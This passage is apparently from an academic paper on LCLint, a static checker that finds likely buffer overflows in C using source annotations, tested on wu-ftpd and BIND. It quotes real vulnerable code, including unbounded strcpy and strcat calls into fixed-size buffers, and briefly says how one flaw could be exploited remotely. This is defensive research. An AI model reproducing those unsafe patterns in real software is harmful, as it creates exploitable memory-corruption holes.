Several run-time approaches to mitigating the risks associated with buffer overflows have been proposed. Despite their availability, these techniques are not used widely enough to substantially mitigate the effectiveness of buffer overflow attacks. The next section describes representative run-time approaches and speculates on why they are not more widely used.

We propose, instead, to tackle the problem by detecting likely buffer overflow vulnerabilities through a static analysis of program source code. We have implemented a prototype tool that does this by extending LCLint [Evans96].
Our work differs from other work on static detection of buffer overflows in three key ways: (1) we exploit semantic comments added to source code to enable local checking of interprocedural properties; (2) we focus on lightweight static checking techniques that have good performance and scalability characteristics, but sacrifice soundness and completeness; and (3) we introduce loop heuristics, a simple approach for efficiently analyzing many loops found in typical programs.

The next section of this paper provides some background on buffer overflow attacks and previous attempts to mitigate the problem. Section 3 gives an overview of our approach. In Section 4, we report on our experience using our tool on wu-ftpd and BIND, two security-sensitive programs. The following two sections provide some details on how our analysis is done. Section 7 compares our work to related work on buffer overflow detection and static analysis.

Buffer Overflow Attacks and Defenses

The simplest buffer overflow attack, stack smashing [AlephOne96], overwrites a buffer on the stack to replace the return address. When the function returns, instead of jumping to the return address, control will jump to the address that was placed on the stack by the attacker. This gives the attacker the ability to execute arbitrary code.

Programs written in C are particularly susceptible to this type of attack. C provides direct low-level memory access and pointer arithmetic without bounds checking. Worse, the standard C library provides unsafe functions (such as gets) that write an unbounded amount of user input into a fixed size buffer without any bounds checking [ISO99]. Buffers stored on the stack are often passed to these functions. To exploit such vulnerabilities, an attacker merely has to enter an input larger than the size of the buffer and encode an attack program binary in that input. The Internet Worm of 1988 [Spafford88, RE89] exploited this type of buffer overflow vulnerability in fingerd.
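As an illustration of the point about gets, the following sketch shows a bounded alternative built on the standard fgets function. The helper name read_line_bounded and its return convention are assumptions made for this example; they are not part of the standard library or of the tool described in this paper.

```c
#include <assert.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/*
 * Read one line from `in` into `buf`, never writing more than `size` bytes
 * (including the terminating NUL). The trailing newline is removed.
 * Returns the number of characters stored, or -1 on end of file or error.
 * Input that does not fit is discarded up to the end of the line.
 */
long read_line_bounded(FILE *in, char *buf, size_t size)
{
    size_t len;
    int c;

    if (in == NULL || buf == NULL || size == 0)
        return -1;
    if (size > INT_MAX)
        size = INT_MAX;             /* fgets takes an int length */

    if (fgets(buf, (int)size, in) == NULL)
        return -1;

    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';          /* whole line fit: strip the newline */
    } else {
        /* Line was longer than the buffer: drain the remainder. */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}
```

Unlike gets, the caller states the buffer size, so an oversized input is truncated rather than written past the end of the buffer.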
More sophisticated buffer overflow attacks may exploit unsafe buffer usage on the heap. This is harder, since most programs do not jump to addresses loaded from the heap or to code that is stored in the heap.

Several run-time solutions to buffer overflow attacks have been proposed. StackGuard [CPMH+98] is a compiler that generates binaries that incorporate code designed to prevent stack smashing attacks. It places a special value on the stack next to the return address, and checks that it has not been tampered with before jumping. Baratloo, Singh and Tsai describe two run-time approaches: one replaces unsafe library functions with safe implementations; the other modifies executables to perform sanity checking of return addresses on the stack before they are used [BST00].

Software fault isolation (SFI) is a technique that inserts bit mask instructions before memory operations to prevent access of out-of-range memory [WLAG93]. This alone does not offer much protection against typical buffer overflow attacks since it would not prevent a program from writing to the stack address where the return value is stored. Generalizations of SFI can insert more expressive checking around potentially dangerous operations to restrict the behavior of programs more generally. Examples include Janus, which observes and mediates behavior by monitoring system calls [GWTB96]; Naccio [ET99, Evans00a] and PSLang/PoET [ES99, ES00], which transform object programs according to a safety policy; and Generic Software Wrappers [FBF99], which wraps system calls with security checking code.

Buffer overflow attacks can be made more difficult by modifications to the operating system that put code and data in separate memory segments, where the code segment is read-only and instructions cannot be executed from the data segment.
This does not eliminate the buffer overflow problem, however, since an attacker can still overwrite an address stored on the stack to make the program jump to any point in the code segment. For programs that use shared libraries, it is often possible for an attacker to jump to an address in the code segment that can be used maliciously (e.g., a call to system). Developers decided against using this approach in the Linux kernel since it did not solve the real problem and it would prevent legitimate uses of self-modifying code [Torvalds98, Coolbaugh99]. Despite the availability of these and other run-time approaches, buffer overflow attacks remain a persistent problem. Much of this may be due to lack of awareness of the severity of the problem and the availability of practical solutions. Nevertheless, there are legitimate reasons why the run-time solutions are unacceptable in some environments. Run-time solutions always incur some performance penalty (StackGuard reports performance overhead of up to 40% [CBDP+99]). The other problem with run-time solutions is that while they may be able to detect or prevent a buffer overflow attack, they effectively turn it into a denial-of-service attack. Upon detecting a buffer overflow, there is often no way to recover other than terminating execution. Static checking overcomes these problems by detecting likely vulnerabilities before deployment. Detecting buffer overflow vulnerabilities by analyzing code in general is an undecidable problem.[1] Nevertheless, it is possible to produce useful results using static analysis. Rather than attempting to verify that a program has no buffer overflow vulnerabilities, we wish to have reasonable confidence of detecting a high fraction of likely buffer overflow vulnerabilities. We are willing to accept a solution that is both unsound and incomplete. This means that our checker will sometimes generate false warnings and sometimes miss real problems. 
Our goal is to produce a tool that produces useful results for real programs with a reasonable effort. The next section describes our approach. We compare our work with other static approaches to detecting buffer overflow vulnerabilities in Section 7. Approach Our static analysis tool is built upon LCLint [EGHT94, Evans96, Evans00b], an annotation-assisted lightweight static checking tool. Examples of problems detected by LCLint include violations of information hiding, inconsistent modifications of caller-visible state or uses of global variables, misuses of possibly NULL references, uses of dead storage, memory leaks and problems with parameters aliasing. LCLint is actually used by working programmers, especially in the open source development community [Orcero00, PG00]. Our approach is to exploit semantic comments (henceforth called annotations) that are added to source code and standard libraries. Annotations describe programmer assumptions and intents. They are treated as regular C comments by the compiler, but recognized as syntactic entities by LCLint using the @ following the /* to identify a semantic comment. For example, the annotation /*@notnull@*/ can be used syntactically like a type qualifier. In a parameter declaration, it indicates that the value passed for this parameter may not be NULL. Although annotations can be used on any declaration, for this discussion we will focus exclusively on function and parameter declarations. We can also use annotations similarly in declarations of global and local variables, types and type fields. Annotations constrain the possible values a reference can contain either before or after a function call. For example, the /*@notnull@*/ annotation places a constraint on the parameter value before the function body is entered. When LCLint checks the function body, it assumes the initial value of the parameter is not NULL. 
When LCLint checks a call site, it reports a warning unless it can determine that the value passed as the corresponding parameter is never NULL.

Prior to this work, all annotations supported by LCLint classified references as being in one of a small number of possible states. For example, the annotation /*@null@*/ indicated that a reference may be NULL, and the annotation /*@notnull@*/ indicated that a reference is not NULL. In order to do useful checking of buffer overflow vulnerabilities, we need annotations that are more expressive. We are concerned with how much memory has been allocated for a buffer, something that cannot be adequately modeled using a finite number of states. Hence, we need to extend LCLint to support a more general annotation language. The annotations are more expressive, but still within the spirit of simple semantic comments added to programs.

The new annotations allow programmers to explicitly state function preconditions and postconditions using requires and ensures clauses.[2] We can use these clauses to describe assumptions about buffers that are passed to functions and constrain the state of buffers when functions return. For the analyses described in this paper, four kinds of assumptions and constraints are used: minSet, maxSet, minRead and maxRead.[3]

When used in a requires clause, the minSet and maxSet annotations describe assumptions about the lowest and highest indices of a buffer that may be safely used as an lvalue (e.g., on the left-hand side of an assignment). For example, consider a function with an array parameter a and an integer parameter i that has a precondition requires maxSet(a) >= i. The analysis assumes that at the beginning of the function body, a[i] may be used as an lvalue. If a[i+1] were used before any modifications to the value of a or i, LCLint would generate a warning since the function preconditions are not sufficient to guarantee that a[i+1] can be used safely as an lvalue.
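To make the requires example concrete, here is a minimal sketch of a function carrying that precondition. The function names store_at and fill_demo are hypothetical, and the placement of the annotation between the parameter list and the body is an assumption modeled on the /*@ ... @*/ comment form; a C compiler sees only an ordinary comment, so the code compiles unchanged.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical example: the caller promises that index i of a is writable. */
void store_at(int *a, int i, int value)
    /*@requires maxSet(a) >= i@*/
{
    a[i] = value;   /* allowed: the precondition covers index i */
    /* Writing a[i + 1] here would not be covered by the precondition. */
}

/* A call site that satisfies the precondition. */
int fill_demo(void)
{
    int buf[4];             /* highest writable index is 3 */

    store_at(buf, 3, 42);   /* maxSet(buf) >= 3 holds */
    /* store_at(buf, 4, 42) would violate the precondition. */
    return buf[3];
}
```

The annotation documents the contract in the source itself, which is what lets each function be checked locally against its own precondition and each call site against the callee's.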
Arrays in C start with index 0, so the declaration char buf[MAXSIZE] generates the constraints maxSet(buf) = MAXSIZE - 1 and minSet(buf) = 0.

Similarly, the minRead and maxRead constraints indicate the minimum and maximum indices of a buffer that may be read safely. The value of maxRead for a given buffer is always less than or equal to the value of maxSet. In cases where some elements of the buffer have not yet been initialized, the value of maxRead may be lower than the value of maxSet.

At a call site, LCLint checks that the preconditions implied by the requires clause of the called function are satisfied before the call. Hence, for the requires maxSet(a) >= i example, it would issue a warning if it cannot determine that the array passed as a is allocated to hold at least as many elements as the value passed as i. If minSet or maxSet is used in an ensures clause, it indicates the state of a buffer after the function returns. Checking at the call site proceeds by assuming the postconditions are true after the call returns.

For checking, we use an annotated version of the standard library headers. For example, the function strcpy is annotated as[4]:

    char *strcpy (char *s1, const char *s2)
      /*@requires maxSet(s1) >= maxRead(s2)@*/
      /*@ensures maxRead(s1) == maxRead(s2) /\ result == s1@*/;

The requires clause specifies the precondition that the buffer s1 is allocated to hold at least as many characters as are readable in the buffer s2 (that is, the number of characters up to and including its null terminator). The postcondition reflects the behavior of strcpy: it copies the string pointed to by s2 into the buffer s1, and returns that buffer. In ensures clauses, we use the result keyword to denote the value returned by the function.

Many buffer overflows result from using library functions such as strcpy in unsafe ways.
By annotating the standard library, many buffer overflow vulnerabilities can be detected even before adding any annotations to the target program. Selected annotated standard library functions are shown in Appendix A.

Experience

In order to test our approach, we used our tool on wu-ftpd, a popular open source ftp server, and BIND (Berkeley Internet Name Domain), a set of domain name tools and libraries that is considered the reference implementation of DNS. This section describes the process of running LCLint on these applications, and illustrates how our checking detected both known and unknown buffer overflow vulnerabilities in each application.

4.1 wu-ftpd

We analyzed wu-ftp-2.5.0[5], a version with known security vulnerabilities. Running LCLint is similar to running a compiler. It is typically run from the command line by listing the source code files to check, along with flags that set checking parameters and control which classes of warnings are reported. It takes just over a minute for LCLint to analyze all 17 000 lines of wu-ftpd. Running LCLint on the entire unmodified source code for wu-ftpd without adding any annotations resulted in 243 warnings related to buffer overflow checking.

Consider a representative message[6]:

    ftpd.c:1112:2: Possible out-of-bounds store. Unable to resolve constraint:
      maxRead ((entry->arg[0] @ ftpd.c:1112:23)) <= (1023)
    needed to satisfy precondition:
      requires maxSet ((ls_short @ ftpd.c:1112:14)) >= maxRead ((entry->arg[0] @ ftpd.c:1112:23))
    derived from strcpy precondition:
      requires maxSet () >= maxRead ()

Relevant code fragments are shown below; line 1112 is the call to strcpy:

    char ls_short[1024];
    ...
    extern struct aclmember *
      getaclentry(char *keyword, struct aclmember **next);
    ...
    int main(int argc, char **argv, char **envp)
    {
      ...
      entry = (struct aclmember *) NULL;
      if (getaclentry("ls_short", &entry)
          && entry->arg[0]
          && (int)strlen(entry->arg[0]) > 0)
      {
        strcpy(ls_short,entry->arg[0]);
        ...
This code is part of the initialization code that reads configuration files. Several buffer overflow vulnerabilities were found in the wu-ftpd initialization code. Although this vulnerability is not likely to be exploited, it can cause security holes if an untrustworthy user is able to alter configuration files.

The warning message indicates that a possible out-of-bounds store was detected on line 1112 and contains information about the constraint LCLint was unable to resolve. The warning results from the function call to strcpy. LCLint generates a precondition constraint corresponding to the strcpy requires clause maxSet(s1) >= maxRead(s2) by substituting the actual parameters: maxSet (ls_short @ ftpd.c:1112:14) >= maxRead (entry->arg[0] @ ftpd.c:1112:23). Note that the locations of the expressions passed as actual parameters are recorded in the constraint. Since values of expressions may change through the code, it is important that constraints identify values at particular program points.

The global variable ls_short was declared as an array of 1024 characters. Hence, LCLint determines maxSet (ls_short) is 1023. After the call to getaclentry, the local entry->arg[0] points to a string of arbitrary length read from the configuration file. Because there are no annotations on the getaclentry function, LCLint does not assume anything about its behavior. In particular, the value of maxRead (entry->arg[0]) is unknown. LCLint reports a possible buffer misuse, since the constraint derived from the strcpy requires clause may not be satisfied if the value of maxRead (entry->arg[0]) is greater than 1023.

To fix this problem, we modified the code to handle these values safely by using strncpy. Since ls_short is a fixed size buffer, a simple change to use strncpy and store a null character at the end of the buffer is sufficient to ensure that the code is safe.[7]

In other cases, eliminating a vulnerability involved both changing the code and adding annotations.
For example, LCLint generated a warning for a call to strcpy in the function acl_getlimit:

    int acl_getlimit(char *class, char *msgpathbuf)
    {
      int limit;
      struct aclmember *entry = NULL;

      if (msgpathbuf) *msgpathbuf = '\0';
      while (getaclentry("limit", &entry)) {
        ...
        if (!strcasecmp(class, entry->arg[0])) {
          ...
          if (entry->arg[3] && msgpathbuf != NULL)
            strcpy(msgpathbuf, entry->arg[3]);
          ...

If the size of msgpathbuf is less than the length of the string in entry->arg[3], there is a buffer overflow. To fix this we replaced the strcpy call with a safe call to strncpy:

    strncpy(msgpathbuf, entry->arg[3], 199);
    msgpathbuf[199] = '\0';

and added a requires clause to the function declaration:

    /*@requires maxSet(msgpathbuf) >= 199@*/

The requires clause documents an assumption (that may be incorrect) about the size of the buffer passed to acl_getlimit. Because of the constraints denoted by the requires clauses, LCLint does not report a warning for the call to strncpy. When call sites are checked, LCLint produces a warning if it is unable to determine that this requires clause is satisfied. Originally, we had modified the function acl_getlimit by adding the precondition maxSet (msgpathbuf) >= 1023. After adding this precondition, LCLint produced a warning for a call site that passed a 200-byte buffer to acl_getlimit. Hence, we replaced the requires clause with one that a 200-byte buffer can satisfy, maxSet (msgpathbuf) >= 199, and used 199 as the parameter to strncpy.

This vulnerability was still present in the current version of wu-ftpd. We contacted the wu-ftpd developers, who acknowledged the bug but did not consider it security critical since the string in question is read from a local file rather than from user input [Luckin01, Lundberg01].

In addition to the previously unreported buffer overflows in the initialization code, LCLint detected a known buffer overflow in wu-ftpd. The buffer overflow occurs in the function do_elem shown below, which passes a global buffer and its parameters to the library function strcat.
The function mapping_chdir calls do_elem with a value entered by the remote user as its parameter. Because wu-ftpd fails to perform sufficient bounds checking, a remote user is able to exploit this vulnerability to overflow the buffer by carefully creating a series of directories and executing the cd command.[8]

    char mapped_path [200];
    ...
    void do_elem(char *dir)
    {
      ...
      if (!(mapped_path[0] == '/' && mapped_path[1] == '\0'))
        strcat (mapped_path, "/");
      strcat (mapped_path, dir);
    }

LCLint generates warnings for the unsafe calls to strcat. This was fixed in later versions of wu-ftpd by calling strncat instead of strcat.

Because of the limitations of static checking, LCLint sometimes generates spurious error messages. If the user believes the code is correct, annotations can be added to precisely suppress spurious messages.

Often the code was too complex for LCLint to analyze correctly. For example, LCLint reports a spurious warning for this code fragment since it cannot determine that (int) ((1.0*j*rand()) / (RAND_MAX + 1.0)) always produces a value between 0 and j - 1:

    i = passive_port_max - passive_port_min + 1;
    port_array = calloc (i, sizeof (int));
    for (i = 3; ... && (i > 0); i--) {
      for (j = passive_port_max - passive_port_min + 1; ... && (j > 0); j--) {
        k = (int) ((1.0 * j * rand()) / (RAND_MAX + 1.0));
        pasv_port_array [j-1] = port_array [k];

Determining that the port_array[k] reference is safe would require far deeper analysis and more precise specifications than is feasible within a lightweight static checking tool.

Detecting buffer overflows with LCLint is an iterative process. Many of the constraints we found involved functions that are potentially unsafe. We added function preconditions to satisfy these constraints where possible. In certain cases, the code was too convoluted for LCLint to determine that our preconditions satisfied the constraints. After convincing ourselves the code was correct, we added annotations to suppress the spurious warnings.
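The strncpy and strncat repairs described in this section follow a common pattern. The sketch below illustrates it under the assumption that the destination is a buffer whose size is known at the call. The helper names bounded_copy and bounded_append are hypothetical and do not appear in wu-ftpd, and the annotations simply follow the style used earlier for size parameters.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy src into dst, truncating if needed; dst always ends up null-terminated. */
void bounded_copy(char *dst, size_t dst_size, const char *src)
    /*@requires maxSet(dst) >= (dst_size - 1)@*/
{
    assert(dst != NULL && src != NULL && dst_size > 0);
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';   /* strncpy does not terminate when it truncates */
}

/* Append src to the string already in dst without writing past dst_size bytes. */
void bounded_append(char *dst, size_t dst_size, const char *src)
    /*@requires maxSet(dst) >= (dst_size - 1)@*/
{
    size_t used;

    assert(dst != NULL && src != NULL && dst_size > 0);
    used = strlen(dst);
    assert(used < dst_size);    /* dst must already hold a terminated string */
    /* strncat appends at most n characters and then writes a terminator */
    strncat(dst, src, dst_size - 1 - used);
}
```

Both helpers silently truncate. Whether truncation is acceptable depends on the caller: for a path such as mapped_path, rejecting an oversized input may be a better choice than shortening it.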
Before any annotations were added, running LCLint on wu-ftpd resulted in 243 warnings, each corresponding to an unresolved constraint. We added 22 annotations to the source code through an iterative process similar to the examples described above. Nearly all of the annotations were used to indicate preconditions constraining the value of maxSet for function parameters.

After adding these annotations and modifying the code, running LCLint produced 143 warnings. Of these, 88 reported unresolved constraints involving maxSet. While we believe the remaining warnings did not indicate bugs in wu-ftpd, LCLint’s analyses were not sufficiently powerful to determine the code was safe. Although this is a higher number of spurious warnings than we would like, most of the spurious warnings can be quickly understood and suppressed by the user.

The source code contains 225 calls to the potentially buffer overflowing functions strcat, strcpy, strncat, strncpy, fgets and gets. Only 18 of the unresolved warnings resulted from calls to these functions. Hence, LCLint is able to determine that 92% of these calls are safe automatically. The other warnings all dealt with classes of problems that could not be detected through simple lexical techniques.

4.2 BIND

BIND is a key component of the Internet infrastructure. Recently, the Wall Street Journal identified buffer overflow vulnerabilities in BIND as a critical threat to the Internet [WSJ01]. We focus on named, the DNS server portion of BIND, in this case study. We analyzed BIND version 8.2.2p7[9], a version with known bugs. BIND is larger and more complex than wu-ftpd. The name server portion of BIND, named, contains approximately 47 000 lines of C including shared libraries. LCLint took less than three and a half minutes to check all of the named code.

We limited our analysis to a subset of named because of the time required for human analysis.
We focused on three files: ns_req.c and two library files that contain functions which are called extensively by ns_req.c: ns_name.c and ns_sign.c. These files contain slightly more than 3 000 lines of code.

BIND makes extensive use of functions in its internal library rather than C library functions. In order to accurately analyze individual files, we needed to annotate the library header files. The most accurate way to annotate the library would be to iteratively run LCLint on the library and add annotations. However, the library is extremely large and contains deeply nested call chains. To avoid the human analysis this would require, we added annotations to some of the library functions without annotating all the dependent functions. In many cases, we were able to guess preconditions by using comments or the names of function parameters. For example, several functions took a pointer parameter (p) and another parameter encoding its size (psize), from which we inferred a precondition maxSet(p) >= (psize - 1).

After annotating selected BIND library functions, we were able to check the chosen files without needing to fully annotate all of BIND. LCLint produces warnings for a series of unguarded buffer writes in the function req_query. The code in question is called in response to a specific type of query which requests information concerning the domain name server version. BIND appends a response to the buffer containing the query that includes a global string read from a configuration file. If the default configuration is used, the code is safe because this function is only called with buffers that are large enough to store the response. However, the restrictions on the safe use of this function are not obvious and could easily be overlooked by someone modifying the code. Additionally, it is possible that an administrator could reconfigure BIND to use a value for the server version string large enough to make the code unsafe.
The BIND developers agreed that a bounds check should be inserted to eliminate this risk [Andrews01].

BIND uses extensive run time bounds checking. This type of defensive programming is important for writing secure programs, but does not guarantee that a program is secure. LCLint detected a known buffer overflow in a function that used run time checking but specified buffer sizes incorrectly.[10]

The function ns_req examines a DNS query and generates a response. As part of its message processing, it looks for a signature and signs its response with the function ns_sign. LCLint reported that it was unable to satisfy a precondition for ns_sign that requires the size of the message buffer be accurately described by a size parameter. This precondition was added when we initially annotated the shared library. A careful hand analysis of this function reveals that, due to careless modification of variables denoting buffer length, it is possible for the buffer length to be specified incorrectly if the message contains a signature but a valid key is not found. This buffer overflow vulnerability was introduced when a digital signature feature was added to BIND (ironically to increase security). Static analysis tools can be used to quickly alert programmers to assumptions that are broken by incremental code changes.

Based on our case studies, we believe that LCLint is a useful tool for improving the security of programs. It does not detect all possible buffer overflow vulnerabilities, and it can generate spurious warnings. In practice, however, it provides programmers concerned about security vulnerabilities with useful assistance, even for large, complex programs. In addition to aiding in the detection of exploitable buffer overflows, the process of adding annotations to code encourages a disciplined style of programming and produces programs that include reliable and precise documentation.
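Run-time bounds checks of the kind discussed above are only as reliable as the length they are given. As a minimal sketch, the hypothetical Message type and msg_append function below (neither is taken from BIND) keep the storage pointer, its capacity and the number of bytes used in one place, so a caller cannot update one without the others.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical message buffer: storage, capacity and bytes used travel together. */
typedef struct {
    unsigned char *data;
    size_t capacity;
    size_t used;
} Message;

/* Append len bytes, or refuse and leave the message unchanged if they do not fit. */
bool msg_append(Message *m, const void *bytes, size_t len)
{
    assert(m != NULL && bytes != NULL && m->used <= m->capacity);
    if (len > m->capacity - m->used)
        return false;               /* not enough room: nothing is written */
    memcpy(m->data + m->used, bytes, len);
    m->used += len;
    return true;
}
```

The check compares len against the remaining space rather than testing used + len against capacity, which avoids wrap-around when len is very large.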
Implementation

Our analysis is implemented by combining traditional compiler data flow analyses with constraint generation and resolution. Programs are analyzed at the function level; all interprocedural analyses are done using the information contained in annotations.

We support four types of constraints corresponding to the annotations introduced in Section 2: maxSet, minSet, maxRead, and minRead. Constraints can also contain constants and variables and allow the arithmetic operations: + and -. Terms in constraints can refer to any C expression, although our analysis will not be able to evaluate some C expressions statically.

The full constraint grammar is:

    constraint           => (requires | ensures)
                            constraintExpression relOp constraintExpression
    relOp                => == | > | >= | < | <=
    constraintExpression => constraintExpression binaryOp constraintExpression
                          | unaryOp ( constraintExpression )
                          | term
    binaryOp             => + | -
    unaryOp              => maxSet | maxRead | minSet | minRead
    term                 => variable | C expression | literal | result

Source-code annotations allow arbitrary constraints (as defined by our constraint grammar) to be specified as the preconditions and postconditions of functions. Constraints can be conjoined (using /\), but there is no support for disjunction. All variables used in constraints have an associated location. Since the value stored by a variable may change in the function body, it is important that the constraint resolver can distinguish the value at different points in the program execution.

Constraints are generated at the expression level and stored in the corresponding node in the parse tree. Constraint resolution is integrated with the checking by resolving constraints at the statement level as checking traverses up the parse tree. Although this limits the power of our analysis, it ensures that it will be fast and simple. The remainder of this section describes briefly how constraints are represented, generated and resolved.
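One way to picture the constraint grammar is as a small tree data type. The sketch below is an illustration only: the type and function names are hypothetical and are not LCLint's internal representation. It also shows two operations a resolver would plausibly need, folding a literal-only expression into one value and deciding a relation between two known values.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef enum { MAX_SET, MAX_READ, MIN_SET, MIN_READ } UnaryOp;   /* unaryOp */
typedef enum { REL_EQ, REL_GT, REL_GE, REL_LT, REL_LE } RelOp;   /* relOp */
typedef enum { EXPR_LITERAL, EXPR_TERM, EXPR_UNARY, EXPR_BINARY } ExprKind;

/* constraintExpression: a literal, a named term, unaryOp(expr), or expr (+|-) expr */
typedef struct Expr {
    ExprKind kind;
    long literal;               /* EXPR_LITERAL */
    const char *term;           /* EXPR_TERM: variable, C expression or result */
    UnaryOp unary_op;           /* EXPR_UNARY */
    char binary_op;             /* EXPR_BINARY: '+' or '-' */
    const struct Expr *left;    /* unary operand, or left operand of a binary node */
    const struct Expr *right;   /* right operand of a binary node */
} Expr;

/* constraint: (requires | ensures) lhs relOp rhs */
typedef struct {
    bool is_requires;
    RelOp rel;
    const Expr *lhs;
    const Expr *rhs;
} Constraint;

/* Fold an expression built only from literals, + and - into a single value.
 * Returns false if the expression mentions a term or a buffer operator. */
bool fold_constants(const Expr *e, long *out)
{
    long l, r;

    assert(e != NULL && out != NULL);
    switch (e->kind) {
    case EXPR_LITERAL:
        *out = e->literal;
        return true;
    case EXPR_BINARY:
        if (!fold_constants(e->left, &l) || !fold_constants(e->right, &r))
            return false;
        *out = (e->binary_op == '+') ? l + r : l - r;
        return true;
    default:
        return false;
    }
}

/* Decide a relation between two already-known values. */
bool relation_holds(RelOp rel, long lhs, long rhs)
{
    switch (rel) {
    case REL_EQ: return lhs == rhs;
    case REL_GT: return lhs > rhs;
    case REL_GE: return lhs >= rhs;
    case REL_LT: return lhs < rhs;
    case REL_LE: return lhs <= rhs;
    }
    return false;
}
```

In this model a declaration such as char ls_short[1024] would contribute the folded value 1024 - 1 = 1023 for maxSet, which can then be compared against the other side of a requires clause when that side is also known.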
Constraints are generated for C statements by traversing the parse tree and generating constraints for each subexpression. We determine constraints for a statement by conjoining the constraints of its subexpressions. This assumes subexpressions cannot change state that is used by other subexpressions of the same expression. The semantics of C make this a valid assumption for nearly all expressions: it is undefined behavior in C for two subexpressions not separated by a sequence point to read and write the same data. Since LCLint detects and warns about this type of undefined behavior, it is reasonable for the buffer overflow checking to rely on this assumption. A few C expressions do have intermediate sequence points (such as the comma operator which specifies that the left operand is always evaluated first) and cannot be analyzed correctly by our simplified assumptions. In practice, this has not been a serious limitation for our analysis.

Constraints are resolved at the statement level in the parse tree and above using axiomatic semantics techniques. Our analysis attempts to resolve constraints using postconditions of earlier statements and function preconditions. To aid in constraint resolution, we simplify constraints using standard algebraic techniques such as combining constants and substituting terms. We also use constraint-specific simplification rules such as maxSet(ptr + i) = maxSet(ptr) - i. We have similar rules for maxRead, minSet, and minRead.

Constraints for statement lists are produced using normal axiomatic semantics rules and simple logic to combine the constraints of individual statements. For example, the code fragment

    1  t++;
    2  *t = 'x';
    3  t++;

leads to the constraints: requires maxSet(t @ 1:1) >= 1, ensures maxRead(t @ 3:4) >= -1 and ensures (t @ 3:4) = (t @ 1:1) + 2. The assignment to *t on line 2 produces the constraint requires maxSet(t @ 2:2) >= 0. The increment on line 1 produces the constraint ensures (t@1:4) = (t@1:1) + 1.
The increment constraint is substituted into the maxSet constraint to produce requires maxSet (t@1:1 + 1) >= 0. Using the constraint-specific simplification rule, this simplifies to requires maxSet (t@1:1) - 1 >= 0 which further simplifies to requires maxSet(t @ 1:1) >= 1.

Control Flow

Statements involving control flow, such as while and for loops and if statements, require more complex analysis than simple statement lists. For if statements and loops, the predicate often provides a guard that makes a possibly unsafe operation safe. In order to analyze such constructs well, LCLint must take into account the value of the predicate on different code paths. For each predicate, LCLint generates three lists of postcondition constraints: those that hold regardless of the truth value of the predicate, those that hold when the predicate evaluates to true, and those that hold when the predicate evaluates to false.

To analyze an if statement, we develop branch specific guards based on our analysis of the predicate and use these guards to resolve constraints within the body. For example, in the statement

    if (sizeof (s1) > strlen (s2)) strcpy(s1, s2);

if s1 is a fixed-size array, sizeof (s1) will be equal to maxSet(s1) + 1. Thus the if predicate allows LCLint to determine that the constraint maxSet(s1) >= maxRead(s2) holds on the true branch. Based on this constraint LCLint determines that the call to strcpy is safe.

Looping constructs present additional problems. Previous versions of LCLint made a gross simplification of loop behavior: all for and while loops in the program were analyzed as though the body executed either zero or one times. Although this is clearly a ridiculous assumption, it worked surprisingly well for the types of analyses done by LCLint.
For the buffer overflow analyses, this simplified view of loop semantics does not provide satisfactory results: to determine whether buf[i] is a potential buffer overflow, we need to know the range of values i may represent. Analyzing the loop as though its body executed only once would not provide enough information about the possible values of i.

In a typical program verifier, loops are handled by requiring programmers to provide loop invariants. Despite considerable effort [Wegbreit75, Cousot77, Collins88, IS97, DLNS98, SI98], no one has yet been able to produce tools that generate suitable loop invariants automatically. Some promising work has been done towards discovering likely invariants by executing programs [ECGN99], but these techniques require well-constructed test suites and many problems remain before this could be used to produce the kinds of loop invariants we need. Typical programmers are not able or willing to annotate their code with loop invariants, so for LCLint to be effective we needed a method for handling loops that produces better results than our previous gross simplification method, but does not require expensive analyses or programmer-supplied loop invariants.

Our solution is to take advantage of the idioms used by typical C programmers. Rather than attempt to handle all possible loops in a general way, we observe that a large fraction of the loops in most C programs are written in a stylized and structured way. Hence, we can develop heuristics for identifying and analyzing loops that match certain common idioms. When a loop matches a known idiom, corresponding heuristics can be used to guess how many times the loop body will execute. This information is used to add additional preconditions to the loop body that constrain the values of variables inside the loop.

To further simplify the analysis, we assume that any buffer overflow that occurs in the loop will be apparent in either the first or last iterations.
This is a reasonable assumption in almost all cases, since it would be quite rare for a program to contain a loop where the extreme values of loop variables were not on the first and last iterations. This allows simpler and more efficient loop checking. To analyze the first iteration of the loop, we treat the loop as an if statement and use the techniques described above. To analyze the last iteration we use a series of heuristics to determine the number of loop iterations and generate additional constraints based on this analysis. An example loop heuristic analyzes loops of the form for (index = 0; expr; index++) body where the body and expr do not modify the index variable and body does not contain a statement (e.g., a break) that could interfere with normal loop execution. Analyses performed by the original LCLint are used to aid loop heuristic pattern matching. For example, we use LCLint’s modification analyses to determine that the loop body does not modify the index variable. For a loop that matches this idiom, it is reasonable to assume that the number of iterations can be determined solely from the loop predicate. As with if statements, we generate three lists of postcondition constraints for the loop test. We determine the terminating condition of the loop by examining the list of postcondition constraints that apply specifically to the true branch. Within these constraints, we look for constraints of the form index <= e. For each of these constraints, we search the increment part of the loop header for constraints matching the form index = index + 1. If we find a constraint of this form, we assume the loop runs for e iterations. Of course, many loops that match this heuristic will not execute for e iterations. Changes to global state or other variables in the loop body could affect the value of e. Hence, our analysis is not sound or complete. For the programs we have tried so far, we have found this heuristic works correctly. 
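A minimal example of a loop that fits the idiom is sketched below. The function fill_prefix is hypothetical and written only for illustration: the index starts at 0, is incremented by one, is not modified in the body, and the body contains no break. The requires clause is what a programmer might add so that the largest index used, n, is covered.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical example: set buf[0] through buf[n] to the character c. */
void fill_prefix(char *buf, int n, char c)
    /*@requires maxSet(buf) >= n@*/
{
    int index;

    assert(buf != NULL && n >= 0);
    for (index = 0; index <= n; index++)   /* loop test has the form index <= e */
        buf[index] = c;                    /* first store is buf[0], last store is buf[n] */
}
```

A loop whose body assigns to index or exits early with break falls outside this idiom, so the estimate taken from the loop test would no longer be justified.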
Abstract syntax trees for loops are converted to a canonical form to increase their chances of matching a known heuristic. After canonicalization, this loop pattern matches a surprisingly high number of cases. For example, in the loop

    for (i = 0; buffer[i]; i++) body

